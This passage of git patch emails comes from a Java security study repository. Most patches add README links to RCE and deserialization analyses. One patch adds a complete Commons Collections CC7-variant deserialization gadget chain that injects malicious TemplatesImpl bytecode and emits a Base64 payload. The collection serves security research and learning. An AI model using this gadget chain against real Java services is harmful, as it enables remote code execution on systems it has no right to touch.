Exception{ + + } +} + +``` From 3ec5cce180a9a85cd4a5dd9d6f66342ff9e6ec29 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 6 Sep 2023 11:53:00 +0800 Subject: [PATCH 19/72] Update README.md Add CommonCollectionsWithoutChainedTransformer --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 1b3e845..35c3c76 100644 --- a/README.md +++ b/README.md @@ -58,6 +58,7 @@ - [CommonsCollections6-HashMap笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections6-HashMap/CommonsCollections6-HashMap.md) - [CommonsCollections6-Shiro1.2.4笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections6-Shiro1.2.4/CommonsCollections6-Shiro1.2.4.md) - [CommonsCollections7笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections7/CommonsCollections7.md) +- [CommonCollectionsWithoutChainedTransformer](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/CommonCollectionsWithoutChainedTransformer/index.md) - [使用TemplatesImpl改造CommonsCollections2](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/%E4%BD%BF%E7%94%A8TemplatesImpl%E6%94%B9%E9%80%A0CommonsCollections2/%E4%BD%BF%E7%94%A8TemplatesImpl%E6%94%B9%E9%80%A0CommonsCollections2.md) - [网上看到的套娃CommonsCollections11](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsCollections11/CommonsCollections11.md) - [CommonsBeanutils1笔记](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/CommonsBeanutils1/CommonsBeanutils1%E7%AC%94%E8%AE%B0.md) From a5ddbc1785346f7b6a960ee1a1d8e9e9567e6319 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 6 Sep 2023 13:26:11 +0800 Subject: [PATCH 20/72] Update README.md Add Spring-Kafka-POC-CVE-2023-34040 --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 35c3c76..12dd21c 100644 --- a/README.md +++ b/README.md @@ -369,6 +369,8 @@ - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) - [Oracle Access Manager Pre-Auth RCE (CVE-2021–35587 Analysis)](https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316) +- Spring + - [Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040) - Nacos - [Aliababa Nacos hessian JRaft反序列化(文章里提到的只能打一次有误,后经过研究可以打多次)](https://y4er.com/posts/nacos-hessian-rce/ ) From f8ee767aef8e73ea8698891e9a4aea24473824c3 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 6 Sep 2023 22:42:54 +0800 Subject: [PATCH 21/72] Update index.md --- .../index.md" | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) diff --git "a/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" index 3738e2d..5a06827 100644 --- "a/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" +++ "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" @@ -91,4 +91,80 @@ public class CommonsCollections6Y4 { } } +``` + +或者配合cc7的变体,这样transform的参数就可以是我们任意控制的了,具体为什么就不讲了,建议复习cc7 +```java + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.LazyMap; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.util.Base64; +import java.util.HashMap; +import java.util.Hashtable; +import java.util.Map; + +public class CC7 { + public static void setFieldValue(Object obj,String fieldName,Object value) throws Exception { + Field field=obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj,value); + } + public static void main(String[] args) throws Exception { + ClassPool classPool=ClassPool.getDefault(); + CtClass ctClass = classPool.get(evil.EvilTemplatesImpl.class.getName()); + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_bytecodes", new byte[][]{ctClass.toBytecode()}); + setFieldValue(templates, "_name", "HelloTemplatesImpl"); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + + Constructor constructor = Class.forName("org.apache.commons.collections.functors.InvokerTransformer").getDeclaredConstructor(String.class); + constructor.setAccessible(true); + InvokerTransformer transformer = (InvokerTransformer) constructor.newInstance("newTransformer"); + + Map hashMap1 = new HashMap(); + Map hashMap2 = new HashMap(); + Map lazyMap1 = LazyMap.decorate(hashMap1, transformer); + lazyMap1.put("0", "yy"); + Map lazyMap2 = LazyMap.decorate(hashMap2, transformer); + lazyMap2.put("yy", templates); + + Hashtable hashtable = new Hashtable(); + hashtable.put(lazyMap1, 1); + hashtable.put(lazyMap2, 1); + + Field table = Class.forName("java.util.HashMap").getDeclaredField("table"); + table.setAccessible(true); + Object[] array = (Object[])table.get(hashMap1); + Object node = array[0]; + if(node == null){ + node = array[1]; + } + Field key = node.getClass().getDeclaredField("key"); + key.setAccessible(true); + key.set(node, templates); + + + ByteArrayOutputStream baos=new ByteArrayOutputStream(); + ObjectOutputStream oos= new ObjectOutputStream(baos); + oos.writeObject(hashtable); + System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray()))); + + ByteArrayInputStream bais=new ByteArrayInputStream(baos.toByteArray()); + ObjectInputStream ois=new ObjectInputStream(bais); + ois.readObject(); + } +} + + ``` From 6adc81039c1b6a0eab1021e974fca680e8fdb49f Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 18 Sep 2023 09:55:59 +0800 Subject: [PATCH 22/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 使用JdkDynamicAopProxy让Jackson的触发更稳定 --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 12dd21c..d107acd 100644 --- a/README.md +++ b/README.md @@ -94,6 +94,7 @@ - [Jackson原生反序列化Gadgets(实用)](https://xz.aliyun.com/t/12485#toc-5) - [Jackson构造过程会触发利用导致中断可通过重写类解决(附上demo学习)](https://github.com/Y4tacker/JavaSec/blob/main/3.FastJson%E4%B8%93%E5%8C%BA/Jackson%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96Gadget/Jackson.txt(%E6%94%B9zip%E5%90%8E%E7%BC%80%E8%A7%A3%E5%8E%8B).txt) + - [从JSON1链中学习处理JACKSON链的不稳定性(使用JdkDynamicAopProxy让触发更稳定)](https://xz.aliyun.com/t/12846#toc-4) - Fastjson From f427ddce312f858ad1bed792417baa674f1c3422 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 1 Nov 2023 09:41:08 +0800 Subject: [PATCH 23/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index d107acd..7fa340d 100644 --- a/README.md +++ b/README.md @@ -388,7 +388,7 @@ - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) - + - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) From af13705594da841a051bae3f2936d38d7f390480 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 8 Nov 2023 10:11:40 +0800 Subject: [PATCH 24/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 7fa340d..2d4c3a5 100644 --- a/README.md +++ b/README.md @@ -38,6 +38,7 @@ - [JSTL(看菜鸟教程即可)](https://www.runoob.com/jsp/jsp-jstl.html) - [JEP290基础概念](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/JEP290%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5/index.md) - [Java中的XXE](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md) + - [XML外部实体注入(XXE)攻击方式汇总(关于XXE可以延伸继续看看)](https://tttang.com/archive/1813/) - [通过反射扫描被注解修饰的类](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E6%89%AB%E6%8F%8F%E8%A2%AB%E6%B3%A8%E8%A7%A3%E4%BF%AE%E9%A5%B0%E7%9A%84%E7%B1%BB/index.md) - [低版本下Java文件系统00截断](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E4%BD%8E%E7%89%88%E6%9C%AC%E4%B8%8BJava%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F00%E6%88%AA%E6%96%AD/index.md) - [有趣的XSS之Normalize](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E6%9C%89%E8%B6%A3%E7%9A%84XSS%E4%B9%8BNormalize/index.md) From 16f782d44cc3084e5789ea7e379ffa3ef15eaa59 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 9 Nov 2023 10:04:29 +0800 Subject: [PATCH 25/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 2d4c3a5..cdc1064 100644 --- a/README.md +++ b/README.md @@ -390,6 +390,7 @@ - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) + - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) From 8b07f3070fdd23ac46a48cc8a916e991e772d441 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 13 Nov 2023 09:51:19 +0800 Subject: [PATCH 26/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Update 某Cloud系统漏洞分析 --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index cdc1064..5ee9215 100644 --- a/README.md +++ b/README.md @@ -470,7 +470,7 @@ - [安全同学讲Maven重打包的故事](https://mp.weixin.qq.com/s?__biz=MzIzOTU0NTQ0MA==&mid=2247510513&idx=1&sn=fbcd84ba56d0c04dbd28b42f10f3bfb1&chksm=e92a94fede5d1de8e8301f8efb9db5e3f1a4fc14a5e29be541668d706a77141bbbd8d63db1ac&mpshare=1&scene=1&srcid=1025aCfF1bF9RgdhX85sgkj3&sharer_sharetime=1666696525299&sharer_shareid=4a549281c7d8f067d766da5aff57a064#rd) - [某软件监控页面RCE漏洞分析(虽然过于简单,但是可以借此了解下OA系统)](https://xz.aliyun.com/t/11778) - [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s/xxAtjFvk9RxWiY-pwGf8Ow) - +- [某Cloud系统漏洞分析](https://forum.butian.net/share/2529) ## 比赛反思 From 669fffbd2d5af9c27df035c8625d5755ab00a045 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 13 Nov 2023 13:48:43 +0800 Subject: [PATCH 27/72] Update README.md CVE-2023-42663 --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5ee9215..e7a554c 100644 --- a/README.md +++ b/README.md @@ -367,6 +367,7 @@ - [Apache Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?__biz=MzkyNDA5NjgyMg==&mid=2247495227&idx=1&sn=5ab9bcc3d89d57ff9799f88c3363814c&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1&scene=1&srcid=0325kmXWImZrXe0btPMEsJDY&sharer_sharetime=1679735505328&sharer_shareid=19374164c9d8647c6159e09a97bb1208#rd) - [Apache Dubbo 反序列化漏洞(CVE-2023-23638)分析及利用探索](https://yyhylh.github.io/2023/04/08/Apache%20dubbo%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2023-23638%EF%BC%89%E5%88%86%E6%9E%90%E5%8F%8A%E5%88%A9%E7%94%A8%E6%8E%A2%E7%B4%A2/) - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) + - [Apache Airflow: Bypass permission verification to view task instances of other dags(CVE-2023-42663)](https://hackerone.com/reports/2208656) - Oracle - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) From 73942b1707f30ec26c9eefad4dbed236f63c40b8 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 16 Nov 2023 09:54:35 +0800 Subject: [PATCH 28/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新超链接-浅谈Spring中的Controller参数的验证机制(注意Hibernate Validator的正确配置) --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index e7a554c..78d5d1a 100644 --- a/README.md +++ b/README.md @@ -299,7 +299,8 @@ - [SpringBoot全局注册Filter过滤XSS](https://github.com/Y4tacker/JavaSec/blob/main/11.Spring/SpringBoot%E5%85%A8%E5%B1%80%E6%B3%A8%E5%86%8CFilter%E8%BF%87%E6%BB%A4XSS/index.md) -- [Springboot devtools反序列化(难点在于secret的获取,当然比如有actuator端点暴露情况下就会变得任意)](https://novysodope.github.io/2022/05/11/77/) +- [Springboot devtools反序列化(难点在于secret的获取,当然比如有actuator端点暴露情况下就会变得容易)](https://novysodope.github.io/2022/05/11/77/) +- [浅谈Spring中的Controller参数的验证机制(注意Hibernate Validator的正确配置)](https://forum.butian.net/share/2538) ## 12.Shiro From fbaa5194516335f0ff152db2db8c8c02cbdf05a6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 24 Nov 2023 13:54:24 +0800 Subject: [PATCH 29/72] Update README.md SysAid On-Prem Software CVE-2023-47246 Vulnerability --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 78d5d1a..1b5befd 100644 --- a/README.md +++ b/README.md @@ -386,13 +386,14 @@ - Smartbi - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) -- 其他 +- Others - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) + - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) From c71061932edab35c111b4d4aaa9a7e810b2567a0 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 28 Nov 2023 09:30:47 +0800 Subject: [PATCH 30/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 1b5befd..25b2c27 100644 --- a/README.md +++ b/README.md @@ -369,6 +369,7 @@ - [Apache Dubbo 反序列化漏洞(CVE-2023-23638)分析及利用探索](https://yyhylh.github.io/2023/04/08/Apache%20dubbo%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2023-23638%EF%BC%89%E5%88%86%E6%9E%90%E5%8F%8A%E5%88%A9%E7%94%A8%E6%8E%A2%E7%B4%A2/) - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) - [Apache Airflow: Bypass permission verification to view task instances of other dags(CVE-2023-42663)](https://hackerone.com/reports/2208656) + - [Apache Jackrabbit RMI 远程代码执行漏洞分析(CVE-2023-37895)(这个漏洞适合了解RMI攻击的基础)](https://xz.aliyun.com/t/13118) - Oracle - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) From c03df0718bfce351bd74898c1d7d4c39f42c5014 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 3 Dec 2023 10:28:47 +0800 Subject: [PATCH 31/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Apache ActiveMQ Jolokia远程代码执行不依赖JDK打法(CVE-2022-41678) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 25b2c27..998b2d6 100644 --- a/README.md +++ b/README.md @@ -370,6 +370,7 @@ - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) - [Apache Airflow: Bypass permission verification to view task instances of other dags(CVE-2023-42663)](https://hackerone.com/reports/2208656) - [Apache Jackrabbit RMI 远程代码执行漏洞分析(CVE-2023-37895)(这个漏洞适合了解RMI攻击的基础)](https://xz.aliyun.com/t/13118) + - [Apache ActiveMQ Jolokia远程代码执行不依赖JDK打法](https://y4tacker.github.io/2023/11/30/year/2023/11/Apache-ActiveMQ-Jolokia%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%B8%8D%E4%BE%9D%E8%B5%96JDK%E6%89%93%E6%B3%95/) - Oracle - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) From 1d588c0fd1ce5061ae8cb0e20c1851d81474083c Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 10 Dec 2023 16:07:18 +0800 Subject: [PATCH 32/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Apache Struts2 文件上传分析(S2-066) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 998b2d6..d8f412a 100644 --- a/README.md +++ b/README.md @@ -221,7 +221,7 @@ - [S2-032学习(清空_memberAccess当中excludedXXX限制通过构造函数调用/使用DefaultMemberAccess覆盖SecurityMemberAccess绕过限制)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-032%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - [S2-045学习(通过container获取全局共享的OgnlUtil实例来清除SecurityMemberAccess当中属性的限制)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-045%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - [S2-057学习(突破#context被删除限制,从attr作用域获取context对象)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-057%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - +- [S2-066学习(变量覆盖的有趣的例子)](https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/) ## 8.关于Tomcat的一些小研究 From b0b9d97ee735338c1d57a78d9289a015eea9c958 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 14 Dec 2023 23:06:09 +0800 Subject: [PATCH 33/72] Update README.md CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index d8f412a..8027373 100644 --- a/README.md +++ b/README.md @@ -396,6 +396,7 @@ - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) + - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) From 0fd015423adb489d84b5882e002a8cc67afea0e7 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 19 Dec 2023 17:13:23 +0800 Subject: [PATCH 34/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 任意文件下载漏洞的利用思考(总结非常细!) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 8027373..5487138 100644 --- a/README.md +++ b/README.md @@ -477,6 +477,7 @@ - [某软件监控页面RCE漏洞分析(虽然过于简单,但是可以借此了解下OA系统)](https://xz.aliyun.com/t/11778) - [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s/xxAtjFvk9RxWiY-pwGf8Ow) - [某Cloud系统漏洞分析](https://forum.butian.net/share/2529) +- [任意文件下载漏洞的利用思考(总结非常细!)](https://mp.weixin.qq.com/s/3y62xuQJAj2gmtBSKvHHug) ## 比赛反思 From ce90a5fd10ef21877bc141a21bce49726d3e27ff Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 21 Dec 2023 10:31:22 +0800 Subject: [PATCH 35/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 浅谈Spring与安全约束SecurityConstraint --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5487138..e5359ea 100644 --- a/README.md +++ b/README.md @@ -276,6 +276,7 @@ ## 11.Spring +-[浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) - [SpirngBoot下结合Tomcat实现无OOB方式下的回显](https://github.com/Y4tacker/JavaSec/blob/main/5.%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/Spring/springboot-tomcat%E5%9B%9E%E6%98%BE/index.md) From c49b9b5c8eb7c21fb69a748a7aa7a5b21299a245 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 21 Dec 2023 10:31:55 +0800 Subject: [PATCH 36/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e5359ea..53aa0eb 100644 --- a/README.md +++ b/README.md @@ -276,7 +276,7 @@ ## 11.Spring --[浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) +- [浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) - [SpirngBoot下结合Tomcat实现无OOB方式下的回显](https://github.com/Y4tacker/JavaSec/blob/main/5.%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/Spring/springboot-tomcat%E5%9B%9E%E6%98%BE/index.md) From a90959efc899541adea965422ade4e8a375c79d5 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 21 Dec 2023 10:37:47 +0800 Subject: [PATCH 37/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 53aa0eb..f97791b 100644 --- a/README.md +++ b/README.md @@ -276,6 +276,7 @@ ## 11.Spring +- [浅谈SpringWeb请求解析过程(很不错的文章把低版本一些绕过的特性基本都提到了)](https://forum.butian.net/share/2214) - [浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) - [SpirngBoot下结合Tomcat实现无OOB方式下的回显](https://github.com/Y4tacker/JavaSec/blob/main/5.%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/Spring/springboot-tomcat%E5%9B%9E%E6%98%BE/index.md) From 51f90702af465a58323016da55ea2e024cb4e316 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 22 Dec 2023 21:26:37 +0800 Subject: [PATCH 38/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index f97791b..857f92a 100644 --- a/README.md +++ b/README.md @@ -442,6 +442,7 @@ ## 19.ASM与JVM学习 +- [目前看到关于ASM框架最详细的学习教程](https://lsieun.github.io/java/asm/) - [JAVA虚拟机执行模型(关注引入了栈映射帧,用于加快虚拟机中类验证过程的速度)](https://www.cnblogs.com/coding-way/p/6600647.html) - [What is a stack map frame](https://stackoverflow.com/questions/25109942/what-is-a-stack-map-frame) - 这里比较有意思的是:Java 1.7引入了此选项以加速类验证。框架分为两部分:变量类型和堆栈类型。第一帧由方法类型描述。在每个GOTO / JUMP调用之后,您需要提供堆栈映射框架的更新描述。为了节省空间,可以使用SAME,APPEND等选项,也可以通过指定变量类型的FULL数组再次描述所有变量。 From e581e2915cde55755a4b8eac8f5dc99888bb33b0 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sat, 23 